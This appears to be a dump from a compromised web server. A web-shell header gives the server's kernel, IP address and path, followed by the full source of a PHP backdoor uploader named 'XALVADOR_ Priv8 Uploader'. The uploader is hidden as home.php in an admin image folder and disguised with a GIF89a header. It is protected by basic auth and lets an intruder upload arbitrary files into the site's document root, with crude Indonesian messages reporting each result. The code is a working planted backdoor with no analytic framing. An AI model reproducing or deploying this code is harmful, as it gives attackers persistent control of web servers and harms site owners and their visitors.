Uname : Linux V-ShopU01 4.18.0-348.20.1.el8_5.x86_64 #1 SMP Thu Mar 10 20:59:28 UTC 2022 x86_64
Server : Apache/2.4.37 (rocky) OpenSSL/1.1.1k
Whoami : apache
Safe Mode : OFF
DOCUMENT ROOT : /var/www/html/site_shopudietDisable Function :
Path : /var/www/html/site_shopudiet/admin/img/
Server IP : 65.20.74.164
Client IP : 18.191.150.109
Current File : /var/www/html/site_shopudiet/admin/img/home.php |
GIF89a;
<?php
// --- pop-up
$user = "";
$pass = "";
if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
{
header("WWW-Authenticate: Basic realm=\"Lebokno Password'e Jancok\"");
header("HTTP/1.0 401 Unauthorized");
exit();
}
// --- php shell
echo "<i>XALVADOR_ Priv8 Uploader</i>
<br>"; echo "<b>".php_uname()."</b><br>"; echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "sukses upload bangsat -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
}
else { echo "gagal upload neng VIP Room cok.";
}
}
else { if(@copy($_FILES['idx_file']['tmp_name'], $files))
{
echo "sukses upload <b>$files</b> neng kamar kene";
}
else { echo "gagal upload";
}
}
}
?>